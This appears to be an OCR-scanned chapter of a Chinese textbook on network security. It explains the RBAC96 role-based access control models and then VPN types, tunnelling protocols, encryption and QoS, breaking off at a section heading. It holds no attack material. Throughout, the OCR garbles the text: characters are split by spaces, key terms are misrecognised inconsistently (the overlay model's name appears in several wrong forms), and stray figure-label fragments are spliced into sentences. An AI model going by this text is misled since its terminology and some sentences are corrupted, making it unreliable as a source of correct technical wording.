角色 由 用 户 自行 定义 ,根据 业务 岗位 不 同 可 以 定义 多 个 角色 。 登 录 系 统 , 首 先 需 要 向 系 
统 申 请 注册 ,同一 个 用 户 只 能 在 系统 中 登记 一 次 ,因此 角色 是 用 户 权限 的 基础 ,用 户 可 以 扮 
演 多 个 角色 。 将 某 一 角色 授予 某 一 用 户 时 .权限 不 能 超越 该 角色 权限 ,但 可 以 小 于 该 角色 权 
限 。 每 个 用 户 在 系统 中 有 一 个 唯一 的 USERID 标识 。 用 户 通过 系统 登录 界面 登录 系统 。 
系统 通过 加 密 算法 验证 用 户 身 份 和 判断 用 户 是 否 已 经 登录 系统 。 如 果 登 录 成 功 , 则 通知 
Application preference service 和 安全 管理 系统 保存 用 户 登录 信息 。 角 色 由 用 户 根 据 自己 
设想 的 组 织 机 构 进行 添加 设置 ,提供 一 个 专门 的 模块 用 来 设置 组 织 机 构 ,用 户 通过 组 织 机 构 
方便 地 进行 角色 管理 。 例 如 用 户 可 以 通过 部 门 机 构 来 进行 角色 的 管理 ,部 门 采 用 编号 分 层 
的 方式 ,编号 的 每 两 位 为 一 个 层次 。 例 如 一 级 部 门 编号 为 2 位 ,二 级 部 门 编号 为 4 位 ,以 此 
类 推 , 直 到 将 全 部 的 部 门 机 构建 立 树 状 结构 图 。 这 类 数据 仅 为 方便 用 户 管理 角色 而 存在 ,在 
系统 的 其 他 方面 不 存在 任何 意义 。 每 个 角色 在 系统 中 也 是 由 一 个 唯一 的 角色 编号 来 标识 
的 ,同时 必须 保存 用 户 所 设置 的 机 构 信 息 ,一 般 来 说 每 个 角色 只 需要 保存 自己 所 在 机 构 的 代 
码 即 可 。 


13.4.3 ROLE-BASE 模型 实现 


美国 Geroge Mason 大 学 信息 系统 和 系统 工程 系 的 R. Sandhu 等 人 在 对 RBAC 进行 深 
入 研究 的 基础 上 ,于 1996 年 提出 了 一 个 基于 角色 的 访问 控制 参考 模型 ,此 模型 被 称 为 


RBAC96 , 它 对 基于 角色 的 访问 控制 产生 了 重大 影响 。RBAC96 模型 因 系 统 全 面 地 描述 了 
RBAC 多 方面 ,多 层次 的 意义 而 得 到 了 广泛 的 认可 。 

下 面 以 RBAC96 模型 为 例 讲解 Role-Base 模型 的 构成 。 

RBAC96 模型 包括 4 个 不 同 层次 ,分 别 为 角色 分 配 


RBACO, RBAC1 RBAC2 RBAC3。 其 ~、 人 
和 其 中 用 户 一 角色 角色 一 权限 


RBACo0 是 基础 模型 ,定义 了 支持 RBAC 的 最 4 RN NY (a) 


小 需求 ,如 用 户 、 角 色 、 权 限 和 会 话 等 概念 。 
RBAC1 和 RBAC2 在 RBACO0 的 基础 上 ,增加 
了 各 自 独立 的 特点 ,它们 被 称 为 高 级 模型 。 在 
RBAC1 中 加 入 了 角色 继承 关系 ,可 以 根据 组 和 由 户 ~_ 信 
织 内 部 权力 和 责任 的 结构 来 构造 角色 与 角色 。、 
之 间 的 层次 关系 ; 在 RBAC2 中 加 入 了 各 种 用 
户 与 角色 之 间 、 权 限 与 角色 之 间 以 及 角色 与 角 
色 之 间 的 约束 关系 ,如 角色 互 斥 .角色 最 大 成 小 BD996 机 二 物 
员 数 等 。RBAC1 和 RBAC2 之 间 不 具有 可 比 
性 。RBAC3 为 巩固 模型 ,是 对 RBACl 和 RBAC2 的 集成 。 它 不 仅 包括 角色 的 层次 关系 ,还 
包括 约束 关系 。RBAC96 模型 的 结构 如 图 13. 12 所 示 。 

1. RBAC0 模型 (基础 模型 ) 

RBACo 为 基础 模型 , 它 主要 包括 若干 实体 集 (U、R、P、S, 即 用 户 集 、 角 色 集 、 权 限 集 、 会 
话 集 ) ,权限 角色 分 配 (是 权限 到 角色 的 多 对 多 的 关系 ) 、 用 户 角 色 分 配 (是 用 户 到 角色 的 多 对 
多 的 关系 ), 如 图 13. 13 所 示 。RBACo0 模型 指明 用 户 、 角 色 \ 访 问 权限 和 会 话 之 间 的 关系 。 
每 个 角色 至 少 具备 一 个 权限 ,每 个 用 户 至 少 扮演 一 个 角色 ; 可 以 对 两 个 完全 不 同 的 角色 分 
配 完全 相同 的 访问 权限 ; 会 话 由 用 户 控 制 , 一 个 用 户 可 以 创建 会 话 并 激活 多 个 用 户 角 色 , 从 
而 获取 相应 的 访问 权限 ,用 户 可 以 在 会 话 中 更 改 激活 角色 ,并 且 可 以 主动 结束 一 个 会 话 。 


(PA) 
(UA) Permission 
Assignment 


图 13.13 RBAC 基础 模型 结构 


2. RBACI 模型 (层次 模型 ) 
RBAC1 和 RBACo0 相 比 ,区 别 一 是 增加 了 角色 的 层次 结构 ,这 个 角色 的 层次 结构 是 角 
色 上 的 一 个 偏 序 关系 , 称 为 角色 层次 关系 。 
该 模型 中 ,用 户 可 以 为 他 具有 的 角色 或 其 下 级 角色 建立 一 个 会 话 , 其 获取 的 访问 权限 包 
括 在 该 会 话 中 激活 角色 所 具有 的 访问 权限 和 下 级 角色 所 具有 的 访问 权限 。 如 果 在 角色 继承 
时 限制 继承 的 范围 , 则 可 建立 私有 和 角色 及 其 私有 子 层次 。 层 次 模型 的 结构 如 图 13. 14 所 示 。 第 
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图 13.14 RBAC 层次 模型 


3. RBAC2 模型 (约束 模型 

RBAC2 模型 在 RBACO0 基础 上 增加 了 约束 机 制 。 约 束 条 件 一 般 有 返回 值 “接受 ”或 “ 拒 
绝 ”, 只 有 拥有 有 效 值 的 元 素 才 可 被 接受 。 模 型 的 结构 如 图 13. 15 所 示 。 约 东 有 多 种 ,主要 
包括 以 下 几 种 。 
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= = (RH 
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13.15 RBAC 静态 责任 分 离 模型 结构 


(1) 互 斥 角色 。 同 一 用 户 只 能 分 配 到 一 组 互 斥 角色 集合 中 至 多 一 个 角色 ,支持 职责 分 
离 的 原则 。 

(2) 基数 约束 。 一 个 角色 被 分 配 的 用 户 数量 是 有 限制 的 ,一 个 用 户 可 拥有 的 角色 数目 
受 限 ; 同样 一 个 角色 对 应 的 访问 权限 数目 也 应 受 限 ,以 控制 高 级 权限 在 系统 中 的 分 配 。 

(3) 先决 条 件 角色 。 可 以 分 配角 色 给 用 户 仅 当 该 用 户 已 经 是 另 一 角色 的 成 员 ; 对 应 的 
可 以 分 配 访问 权限 给 角色 , 仅 当 该 角色 已 经 拥有 另 一 种 访问 权限 。 

(4) 运行 时 互 斥 。 例 如 ,允许 一 个 用 户 具 有 两 个 角色 的 成 员 资格 ,但 在 运行 中 不 可 同时 
激活 这 两 个 角色 。 

4. RBAC3 模型 (层次 约束 模型 ) 

RBAC3 是 RBAC 系列 中 的 最 后 一 个 模型 ,事实 上 是 RBAC1 和 RBAC2 的 综合 , 即 增 
加 了 角色 层次 结构 和 约束 机 制 的 RBACO 模型 。 

RBAC96 中 阻塞 某 些 权限 的 继承 是 通过 私有 角色 来 实现 的 , 即 如 果 一 个 角色 m 的 部 分 
权限 不 希望 被 另 一 个 角色 ts 继承 ,那么 习 必须 将 这 些 权限 分 离 出 来 ,派生 出 一 个 新 的 角色 
1', 称 为 的 私有 角色 。ri 中 只 能 描述 可 以 被 1, 继 承 的 权限 ,而 "中 描述 工 的 私有 权限 。 
这 种 方法 的 最 大 缺点 是 ,将 一 个 逻辑 上 统一 的 ,属于 同一 角色 的 权限 分 离 出 来 ,会 使 得 很 多 
角色 成 为 不 完整 的 角色 ,只 为 继承 而 存在 ,并 没有 实际 的 物理 意义 ,这 样 角色 数量 会 迅速 增 
长 ,特别 是 在 大 型 应 用 中 问题 尤为 突出 。 此 外 私有 角色 的 方法 使 得 继承 关系 变 得 更 加 复杂 。 


因此 ,实现 时 必须 结合 应 用 实际 ,对 RBAC96 模型 进行 必要 的 改进 和 扩充 。 
13.5 VPN 概述 


近年 来 , 随 着 全 球 信息 化 建设 的 快速 发 展 ,对 网 络 基 础 设施 的 功能 和 可 延伸 性 提出 了 新 
的 要 求 。 例 如 ,一 些 跨 地 区 组 织 的 各 分 支 机 构 之 间 需 要 进行 远 距 离 的 互联 ; 一 些 单位 的 员 
工 需 要 远程 接 入 内 部 网 络 进 行 移动 办 公 。 为 了 解决 各 分 支 机 构 局 域 网 之 间 的 互联 问题 , 早 
期 只 能 通过 直接 铺设 网 络 线路 或 租用 运营 商 的 专线 ,不 但 成 本 高 ,而 且 实 现 困难 。 对 于 移动 
办 公用 户 来 说 ,早期 一 般 采 用 拨号 方式 接 人 到 内 部 网 络 ,在 需要 支付 较 高 的 通信 费用 的 同 
时 ,还 要 考虑 到 通信 的 安全 问题 。VPN 技术 可 以 在 公共 网 络 ( 如 Internet) 中 为 用 户 建立 专 
用 的 通道 ,为 局 域 网 之 间 的 远程 互联 ,以 及 内 部 网 络 的 远程 接 人 提供 廉价 和 安全 的 方式 。 在 
接 下 来 的 几 节 中 将 较为 系统 地 介绍 VPN 原理 、 分 类 、 实 现 的 关键 技术 及 设计 实例 。 


13.5.1 VPN 的 工作 原理 


VPN(Virtual Private Network ,虚拟 专用 网 ) 是 利用 Internet 等 公共 网 络 的 基础 设施 ， 
通过 隧道 技术 ,为 用 户 提供 一 条 与 专用 网 络 具 有 相同 通信 功能 的 安全 数据 通道 ,实现 不 同 网 
络 之 间 及 用 户 与 网 络 之 间 的 相互 连接 。IETF 草案 对 基于 IP 网 络 的 VPN 的 定义 为 : 使 用 
IP 机 制 仿真 出 一 个 私有 的 广域网 。 

从 VPN 的 定义 来 看 ,其 中 “虚拟 "是 指 用 户 不 需要 建立 自己 专用 的 物理 线路 ,而 是 利用 
Internet 等 公共 网 络 资源 和 设备 建立 一 条 逻辑 上 的 专用 数据 通道 ,并 实现 与 专用 数据 通道 
相同 的 通信 功能 ;“ 专 用 网 络 ? 是 指 这 一 虚拟 出 来 的 网 络 并 不 是 任何 连接 在 公共 网 络 上 的 用 
户 都 能 够 使 用 的 ,而 是 只 有 经 过 授权 的 用 户 才 可 以 使 用 。 同 时 ,该 通道 内 传输 的 数据 经 过 了 
加 密 和 认证 ,从 而 保证 了 传输 内 容 的 完整 性 和 机 密 性 。 巾 此 可 以 看 出 ,VPN 不 是 一 个 物理 
意义 上 的 专用 网 络 ,但 它 却 具 有 与 物理 专用 网 络 相同 的 功能 。 

从 实现 方法 来 看 ,VPN 是 指 依靠 ISP(Internet Service Provider, Internet 服务 提供 商 ) 
和 NSP(Network Service Provider ,网络 服 务 提供 商 ) 的 网 络 基础 设施 ,在 公共 网 络 中 建立 
专用 的 数据 通信 通道 。 在 VPN 中 ,任意 两 个 节点 之 间 的 连接 并 没有 传统 的 专用 网 络 所 需 
的 端 到 端的 物理 链 路 。 只 是 在 两 个 专用 网 络 之 间或 移动 用 户 与 专用 网 络 之 间 , 利 用 ISP 和 
NSP 提供 的 网 络 服务 ,通过 专用 VPN 设备 和 软件 ,根据 需求 构建 永久 的 或 临时 的 专用 通 
道 。 如 图 13. 16(a) 所 示 的 是 VPN 的 物理 拓扑 ,其 功能 等 价 于 如 图 13. 16(b) 所 示 的 逻辑 
拓扑 。 

在 实际 应 用 中 ,一 个 高 效 .成 功 的 VPN 应 具有 以 下 几 个 特点 。 

1. 费用 低 

由 于 使 用 Internet 进行 传输 相对 于 租用 专用 线 来 说 ,费用 极为 低廉 ,所 以 VPN 的 出 现 
使 企业 通过 Internet 既 安 全 又 经 济 地 传输 私有 的 机 密 信息 成 为 可 能 。 

2. 安全 保障 

虽然 实现 VPN 的 技术 和 方式 很 多 ,但 所 有 的 VPN 均 应 保证 通过 公用 网 络 平台 传输 数 
据 的 专用 性 和 安全 性 。 在 非 面 向 连接 的 公用 IP 网 络 上 建立 一 个 逻辑 的 、 点 对 点 的 连接 , 称 
为 建立 一 个 隧道 。 可 以 利用 加 密 技 术 对 经 过 隧道 传输 的 数据 进行 加 密 , 以 保证 数据 只 被 指 
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定 的 发 送 者 和 接收 者 了 解 ,从 而 保证 数据 的 私有 性 和 安全 性 。 

3. 服务 质量 保证 (QoS) 

VPN 应 当 为 企业 数据 提供 不 同等 级 的 服务 质量 保证 。 不 同 的 用 户 和 业务 对 服务 质量 
保证 的 要 求 差 别 较 大 。 如 对 于 移动 办 公用 户 ,提供 广泛 的 连接 和 覆盖 性 是 保证 VPN 服务 
的 一 个 主要 因素 ,对 于 拥有 众多 分 支 机 构 的 专线 VPN ,交互 式 的 内 部 企业 网 应 用 则 要 求 网 
络 能 提供 良好 的 稳定 性 ; 对 于 其 他 应 用 (如 视频 等 ) 则 对 网 络 提出 了 更 明确 的 要 求 , 如 网 络 
时 延 及 误 码 率 等 。 所 有 以 上 网 络 应 用 均 要 求 网 络 根据 需要 提供 不 同等 级 的 服务 质量 。 在 网 
络 优化 方面 ,构建 VPN 的 另 一 重要 需求 是 充分 有 效 地 利用 有 限 的 广域网 资源 ,为 重要 数据 
提供 可 靠 的 带宽 。 广 域 网 流量 的 不 确定 性 使 其 带宽 的 利用 率 很 低 , 在 流量 高 峰 时 引起 网 络 
阻塞 ,产生 网 络 瓶 颈 , 使 实时 性 要 求 高 的 数据 得 不 到 即时 发 送 , 在 流量 低谷 时 又 造成 大 量 的 
网 络 带宽 空 闸 。QoS 通过 流量 预测 与 流量 控制 策略 ,可 以 按照 优先 级 分 配 带宽 资源 ,实现 
带宽 管理 ,使 得 各 类 数据 能 够 被 合理 地 先后 发 送 ,并 预防 阻塞 的 发 生 。 

4. 可 扩充 性 和 灵活 性 

VPN 必须 能 够 支持 通过 Extranet 和 Intranet 的 任何 类 型 的 数据 流 ,方便 增加 新 的 节 
点 ,支持 多 种 类 型 的 传输 媒介 ,可 以 满足 同时 传输 语音 、 图 像 和 数据 等 新 应 用 对 高 质量 传输 
以 及 带宽 增加 的 需求 。 

5. 可 管理 性 

从 用 户 和 运营 商 角度 应 可 方便 地 进行 管理 维护 。 在 VPN 管理 方面 ,VPN 要 求 企业 将 
其 网 络 管理 功能 从 局 域 网 无 缝 地 延伸 到 公用 网 .甚至 是 客户 和 合作 伙伴 。 虽 然 可 以 将 一 些 
次 要 的 网 络 管理 任务 交 给 服务 提供 商 去 完成 ,企业 自己 仍 需 要 完成 许多 网 络 管理 任务 。 所 
以 一 个 完善 的 VPN 管理 系统 是 必 不 可 少 的 。VPN 管理 的 目标 是 减 小 网 络 风险 。 它 具有 高 
扩展 性 、 经 济 性 、 高 可 靠 性 等 优点 。VPN 管理 主要 包括 安全 管理 ,设备 管理 .配置 管理 ,访问 


控制 列表 管理 和 QoS 管理 等 内 容 。 
13.5.2 VPN 系统 结构 与 分 类 


根据 应 用 环境 的 不 同 ,VPN 主要 分 为 3 种 典型 的 应 用 方式 : 内 联网 VPN 、 外 联网 VPN 
和 远程 接 人 VPN。 

1. 内 联网 VPN 

内 联网 VPN(Intranet VPN) 的 组 网 方式 如 图 13. 17 所 示 。 这 是 一 种 最 常 使 用 的 VPN 
连接 方式 , 它 将 位 于 不 同 地理 位 置 的 两 个 内 部 网 络 (LAN1 和 LAN2) 通 过 公共 网 络 (主要 为 
Internet) 连 接 起 来 ,形成 一 个 逻辑 上 的 局 域 网 。 位 于 不 同 物理 网 络 中 的 用 户 在 通信 时 ,就 像 
在 同一 局 域 网 中 一 样 。 
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VPN 网 关 
13.17 内 联网 VPN 连接 示意 图 


在 内 联网 VPN 未 使 用 之 前 ,如 果 要 实现 两 个 异地 网 络 之 间 的 互联 ,就 必须 直接 铺设 网 
络 线路 ,或 租用 运营 商 的 专线 。 不 管 采用 哪 一 种 方式 ,使 用 和 维护 成 本 都 很 高 ,而 且 不 便于 
网 络 的 扩展 。 在 使 用 了 内 联网 VPN 后 ,可 以 很 方便 实现 两 个 局 域 网 之 间 的 互联 ,其 条 件 是 
分 别 在 每 一 个 局 域 网 中 设置 一 台 VPN 网 关 , 同 时 每 一 个 VPN 网 关 都 需要 分 配 一 个 公用 IP 
地 址 ,以 实现 VPN 网 关 的 远程 连接 。 而 局 域 网 中 的 所 有 主机 都 可 以 使 用 私有 IP 地 址 进行 
通信 。 如 图 13. 17 所 示 的 是 两 个 局 域 网 之 间 通过 VPN 远程 互联 方式 ,根据 用 户 需求 也 可 


以 实现 多 个 局 域 网 之 间 的 远程 互联 。 
目前 ,许多 具有 多 个 分 支 机 构 的 组 织 在 进行 局 域 网 之 间 的 互联 时 ,多 采用 这 种 方式 。 
2. 外 联网 VPN 


外 联网 VPN(Extranet VPN) 的 组 网 方式 如 图 13. 18 所 示 。 与 内 联网 VPN 相似 ,外 联 
网 VPN 也 是 一 种 网 关 对 网 关 的 结构 。 在 内 联网 VPN 中 位 于 LAN1 和 LAN2 中 的 主机 是 
平等 的 ,可 以 实现 彼此 之 间 的 通信 。 但 在 外 联网 VPN 中 ,位 于 不 同 内 部 网 络 (LAN1、LAN2 
和 LAN3) 的 主机 在 功能 上 是 不 平等 的 。 

外 联网 VPN 是 随 着 企业 经 营 方式 的 发 展 而 出 现 的 一 种 网 络 连 接 方 式 。 现 代 企业 需要 
在 企业 与 银行 、 供 应 商 、 销 售 商 及 客户 之 间 建 立 一 种 联系 ( 即 电子 商务 活动 ) ,但 是 在 这 种 联 
系 过 程 中 ,企业 需要 根据 不 同 的 用 户 身份 (如 供应 商 、 销 售 商 等 ) 进 行 授权 访问 ,建立 相应 的 
身份 验证 机 制 和 访问 控制 机 制 。 

外 联网 VPN 其 实 是 对 内 联网 VPN 在 应 用 功能 上 的 延伸 ,是 在 内 联网 VPN 的 基础 上 
增加 了 身份 验证 访问 控制 等 安全 机 制 。 

3. 远程 接 人 VPN 

远程 接 和 人 VPN(Access VPN) 的 组 网 方式 如 图 13. 19 所 示 。 远 程 接 入 VPN 也 称 为 移 
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13.18 外 联网 VPN 连接 示意 图 


动 VPN, 即 为 移动 用 户 提 供 一 种 访问 单位 内 部 网 络 资源 的 方式 ,主要 应 用 于 单位 内 部 人 员 
在 外 ( 非 内 部 网 络 ) 访 问 单位 内 部 网 络 资源 的 情况 下 ,或 为 家 庭 办 公 的 用 户 提 供 远 程 接 入 单 
位 内 部 网 络 的 服务 。 


图 13. 19 远程 接 入 VPN 连接 示意 图 


在 远程 接 入 VPN 技术 出 现 之 前 ,如 果 用 户 要 通过 Internet 连接 到 单位 内 部 网 络 ,需要 
在 单位 内 部 网 络 中 部 署 一 台 远 程 访问 服务 器 (Remote Access Server, RAS) ,用 户 通过 拨号 
方式 连接 到 该 RAS 后 再 根据 相应 权限 来 访问 内 部 网 络 中 的 相应 资源 。 远 程 拨号 方式 需要 
RAS 的 支持 ,而且 用 户 与 RAS 之 间 的 通信 是 以 明文 方式 进行 ,缺乏 安全 性 。 另 外 ,远程 的 
拨号 用 户 可 能 需要 支持 长 途 电话 通信 费 。 而 远程 接 人 VPN 方式 中 的 远程 用 户 ,只 需要 通 
过 当地 的 ISP 接 入 到 Internet 就 可 以 连接 到 单位 的 VPN 网 关 , 并 访问 单位 内 部 的 资源 。 与 
传统 的 远程 拨号 方式 相 比 ,远程 连接 VPN 方式 实现 容易 ,使 用 费用 较 低 。 简 单 来 说 ,只 要 
用 户 能 够 接 入 Internet, 就 可 以 使 用 远程 接 入 VPN 方式 连接 到 单位 内 部 网 络 。 

目前 ,远程 接 入 VPN 方式 的 使 用 非常 广泛 ,许多 企业 和 高 校 都 采用 这 种 方式 为 本 单位 
用 户 提 供 访问 内 部 网 络 资源 的 服务 。 例 如 ,现在 许多 高 校 都 建立 内 部 的 数字 资源 数据 库 , 如 
中 国 期 刊 全 文 数据 库 .电子 图 书馆 和 学 位 论文 数据 库 等 。 考 虑 到 安全 和 版 权 等 问题 ,对 这 些 
数据 库 系 统 的 访问 权限 进行 了 限制 ,一 般 只 允许 本 单位 内 部 的 用 户 在 内 部 局 域 网 中 使 用 。 
为 了 方便 本 单位 用 户 在 外 部 网 络 中 能 够 访问 单位 内 部 的 网 络 资源 ,许多 高 校 都 部 署 了 远程 
访问 VPN 系统 。 


13.6 VPN 实现 的 关键 技术 


13.6.1 隧道 技术 


在 介绍 隧道 技术 之 前 ,首先 介绍 VPN 数据 和 路 由 的 管理 模式 。VPN 数据 和 路 由 的 管 
理 可 以 通过 多 种 方式 来 实现 ,大 致 分 为 两 种 模式 , 即 生 加 模式 (overlay model) 和 对 等 模式 
(peer model) 。 

目前 大 多 数 常用 的 VPN 技术 都 基于 释 加 模式 ,如 IPSec 和 GRE 等 隧道 技术 .租赁 线 
路 、 帧 中 继 电 路 .ATM 电路 等 。 采 用 又 加 模式 ,各 站 点 都 有 一 个 路 由 器 通过 点 到 点 连接 到 
其 他 站 点 的 路 由 器 上 。 一 个 站 点 可 以 有 一 个 或 多 个 这 样 的 路 由 器 ,分 别 连接 到 所 有 的 或 一 
部 分 其 他 站 点 上 ; 站 点 间 点 到 点 的 连接 可 以 通过 IPSec、GRE 或 帧 中 继 、ATM 电路 等 来 实 
现 。 这 个 由 点 到 点 的 连接 以 及 相关 的 路 由 器 组 成 的 网 络 称 为 虚拟 骨干 网 。 虚 拟 骨 干 网 将 各 
站 点 连接 在 一 起 。 

又 加 模式 的 一 个 严重 问题 是 需要 VPN 用 户 设计 并 运作 虚拟 骨干 网 。 这 需要 专业 的 IP 
路 由 知识 和 技能 ,而 大 多 数 公司 不 具备 这 样 的 能 力 。 如 果 将 这 项 工作 交 给 网 络 服务 提供 商 ， 
随 着 VPN 用 户 的 增加 ,网 络 服务 提供 商 设计 维护 越 来 越 多 的 VPN ,这 对 网 络 服务 提供 商 来 
说 将 难以 承受 。 

全 加 模式 的 另 一 个 问题 是 VPN 的 网 络 规模 不 能 太 大 ,可 扩展 性 差 。 如 果 一 个 VPN 用 
户 有 许多 站 点 ,而 且 站 点 间 需 要 全 交叉 网 状 连 接 , 则 一 个 站 点 上 的 骨干 路 由 器 必须 与 其 他 所 
有 站 点 建立 点 对 点 的 路 由 关系 。 站 点 数 的 增加 受 单个 路 由 器 处 理 能 力 的 限制 。 另 外 ,增加 
新 站 点 时 ,网 络 配置 变化 也 会 很 大 ,网 络 连接 上 的 每 个 站 点 都 必须 对 路 由 器 重新 配置 。 

障 道 技术 是 最 常见 的 为 琶 加 模式 的 VPN 提供 站 点 间 连 接 的 方式 。 隧 道 技术 用 添加 IP 
包头 的 方式 对 数据 进行 封装 。IP 包头 包括 路 由 信息 ,使 得 数据 能 够 穿越 中 间 的 公用 网 络 。 
从 穿越 一 个 网 络 传送 数据 角度 讲 ,隧道 涵盖 3 个 主要 方面 , 即 对 数据 包 的 封装 .传输 和 拆 封 。 
隧道 方式 具有 高 速 .安全 等 优势 。 

有 多 种 不 同 的 技术 标准 可 用 于 以 隧道 的 方式 跨越 移动 骨干 网 传输 数据 ,其 中 包括 GRE 
(generic routing encapsulation) .GTP(GPRS tunneling protocol) 和 IPSec(IP Security) (请 
参见 12.2 节 ) 等 。 

随 着 VPN 技术 与 规范 的 不 断 完善 ,为 客服 倒 加 模式 固有 的 种 种 局 限 ,又 推出 了 对 等 模 
式 。 对 等 模式 的 一 个 重要 改进 就 是 可 扩展 性 。 这 使 得 VPN 服务 提供 商 能 够 支持 大 规模 的 
VPN 业务 ,如 一 个 VPN 服务 提供 商 可 支持 成 百 上 千 个 VPN, 而 且 这 些 VPN 用 户 不 需要 有 
IP 专业 技术 ,同时 它 还 能 降低 提供 VPN 服务 的 开销 。 

BGP/MPLS 技术 是 当前 主流 的 对 等 模式 VPN 技术 。MPLS 用 于 在 网 络 间 前 转 数 据 
包 ,BGP 则 用 于 播发 PE 与 P 路 由 器 间 的 路 由 信息 以 及 VPN 的 成 员 信息 。 这 套 机 制 看 起 
来 很 复杂 ,但 在 IETF 的 规范 中 已 定义 了 对 大 多 数 过 程 的 自动 化 处 理 。 因 而 尽管 BGP/ 
MPLS 的 路 由 设备 很 复杂 ,但 实际 上 运营 商 的 工作 是 相对 简单 的 。 

1. IP 网 络 上 的 SNA 隧道 技术 

当 系 统 网 络 结构 (System Network Architecture,SNA) 的 数据 流通 过 企业 IP 网 络 传送 
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时 ,SNA 数据 帧 被 封装 在 UDP 和 IP 协议 包头 中 。 

2. IP 网 络 上 的 Novell NetWare IPX 隧道 技术 

当 一 个 IPX 数据 包 被 发 送 到 NetWare 服务 器 或 IPX 路 由 器 时 ,服务 器 或 路 由 器 用 
UDP 和 IP 包头 封装 IPX 数据 包 后 通过 IP 网 络 发 送 。 另 一 端的 IP-TO-IPX 路 由 器 在 去 除 
UDP 和 IP 包头 之 后 ,把 数据 包 转 发 到 IPX 目的 地 。 

3. 点 对 点 隧道 协议 (PPTP) 

PPTP 协议 允许 对 IP,IPX 或 NetBEUI 数 据 流 进行 加 密 , 然 后 封装 到 IP 包头 中 通过 企 
业 IP 网 络 或 Internet 发 送 。 

4. 第 2 层 隧道 协议 (L2TP) 

L2TP 协议 允许 对 IP,IPX 或 NetBEUI 数据 流 进行 加 密 , 然 后 通过 支持 点 对 点 数据 报 
传递 的 任意 网 络 发 送 ,如 IP、X.25、 帧 中 继 或 ATM。 

5. 安全 IP(IPSec) 隧 道 模式 

IPSec 隧道 模式 允许 对 IP 负载 数据 进行 加 密 ,然后 封装 在 IP 包头 中 通过 企业 IP 网 络 
或 公共 IP 互联 网 发 送 。 


13.6.2 加 密 技 术 


通过 Internet 等 公共 网 络 传输 的 重要 数据 必须 经 过 加 密 处 理 , 以 确保 网 络 上 其 他 未 授 
权 的 实体 无 法 读 取 该 信息 。 目 前 在 网 络 通信 和 领域 中 常用 的 信息 加 密 体制 主要 包括 对 称 加 密 
体制 和 非 对 称 加 密 体制 两 类 。 实 际 应 用 时 一 般 是 将 对 称 加 密 体制 和 非 对 称 加 密 体制 混合 使 
用 ,利用 非 对 称 加 密 技术 进行 密 钥 的 协商 和 交换 ,而 采用 对 称 加 密 技术 进行 用 户 数据 的 
加 密 。 

在 VPN 解决 方案 中 最 普遍 使 用 的 对 称 加 密 算法 主要 有 DES、3DES、AES、RC4、RC5 
和 IDEA 等 算法 。 使 用 的 非 对 称 加 密 算 法 主要 有 RSA 、Diffie-Hellman 和 椭圆 曲线 等 。 


13.6.3 QoS 技术 


通过 隧道 技术 和 加 密 技术 ,已 经 能 够 建立 起 一 个 具有 安全 性 、 互 操作 性 的 VPN。 但 是 
该 VPN 性 能 不 稳定 ,管理 上 不 能 满足 企业 的 要 求 ,这 就 要 加 入 QoS 技术 。 实 行 QoS 应 该 
在 主机 网 络 中 , 即 VPN 所 建立 的 隧道 这 一 段 ,这 样 才能 建立 一 条 性 能 符合 用 户 要 求 的 
隧道 。 

不 同 的 应 用 对 网 络 通信 有 不 同 的 要 求 .这些 要 求 可 用 如 下 参数 体现 。 

。 带宽 。 网 络 提供 给 用 户 的 传输 率 。 

。 反应 时 间 。 用 户 所 能 容忍 的 数据 包 传递 延 时 。 

。 抖动 。 延 时 的 变化 。 

。 委 包 率 。 数 据 包 丢 失 的 比率 。 

网 络 资源 是 有 限 的 。 有 时 用 户 要 求 的 网 络 资源 得 不 到 满足 ,可 以 通过 QoS 机 制 对 用 户 
的 网 络 资源 分 配 进行 控制 以 满足 应 用 的 需求 。QoS 机 制 具 有 通信 处 理 机 制 以 及 供应 
(Provisioning) 和 配置 CConfiguration) 机 制 。 通 信 处 理 机 制 包括 IEEE 802. 1p、 区 分 服务 
(Differentiated Service Per-Hop-Behaviors, DiffServ)、 综 合 服 务 (Integrated Services， 
IntServ) 等 。 现 在 大 多 数 局 域 网 是 基于 IEEE 802 技术 的 ,如 以 太 网 、 令 牌 环 、.FDDI 等 ， 


IEEE 802. 1p 为 这 些 局 域 网 提供 了 一 种 支持 QoS 的 机 制 。IEEE 802. lp 对 链 路 层 的 IEEE 
802 报 文 定义 了 一 个 可 表达 8 种 优先 级 的 字段 。IEEE 802. lp 优先 级 只 在 局 域 网 中 有 效 ， 
一 旦 出 了 局 域 网 ,通过 第 3 层 设 备 时 就 被 移 走 。DiffServ 则 是 第 3 层 的 QoS 机 制 , 它 在 IP 
报 文中 定义 了 一 个 字段 称 DSCP(Differentiated Services Code Point)。DSCP 有 6 位 ,用 作 
服务 类 型 和 优先 级 ,路 由 器 通过 它 对 报 文 进行 排队 和 调度 。 与 IEEE 802. 1p 和 DiffServ 不 
同 的 是 ,IntServ 是 一 种 服务 框架 ,目前 有 两 种 : 保证 服务 和 控制 负载 服务 。 保 证 服务 许诺 
在 保证 的 延 时 下 传播 一 定 的 通信 和 量 ; 控制 负载 服务 则 同意 在 网 络 轻 负载 的 情况 下 传输 一 定 
的 通信 量 。 典 型 地 ,IntServ 与 资源 预 留 协议 (Resource Reservation Protocol, RSVP) 相 关 。 
IntServ 服务 定义 了 允许 进入 的 控制 算法 ,决定 多 少 通信 和 量 被 允许 进入 网 络 中 。 

供应 和 配置 机 制 包括 RSVP、 子 网 带宽 管理 (Subnet Bandwidth Manager, SBM) ,政策 
机 制 和 协议 以 及 管理 工具 和 协议 。 这 里 供应 机 制 指 的 是 比较 静态 的 、 比 较 长 期 的 管理 任务 ， 
如 网 络 设备 的 选择 、 网 路 设备 的 更 新 、 接 口 的 添加 删除 .拓扑 结构 的 改变 等 。 配 置 机 制 指 的 
是 比较 动态 .比较 短期 的 管理 任务 ,如 流量 处 理 的 参数 等 。 

网 络 管理 员 基于 一 定 的 政策 进行 QoS 机 制 配置 。 政 策 组 成 部 分 包括 政策 数据 ,如 用 户 
名 ; 有 权 使 用 的 网 络 资源 ; 政策 决定 点 (Policy Decision Point,PDP); 政策 加 强 点 (Policy 
Enforcement Point, PEP) 以 及 它们 之 间 的 协议 。 传 统 的 由 上 而 下 的 政策 协议 包括 简单 网 络 
管理 协议 (Simple Network Management Protocol, SNMP) 、 命 令 行 接口 (Command Line 
Interface,CLD) ,命令 开放 协议 服务 (Command Open Protocol Services,COPS ) 等 。 这 些 
QoS 机 制 相互 作用 使 网 络 资源 得 到 最 大 化 利用 ,同时 又 向 用 户 提 供 了 一 个 性 能 良好 的 网 络 
服务 。 


13.7 VPN 设计 实例 


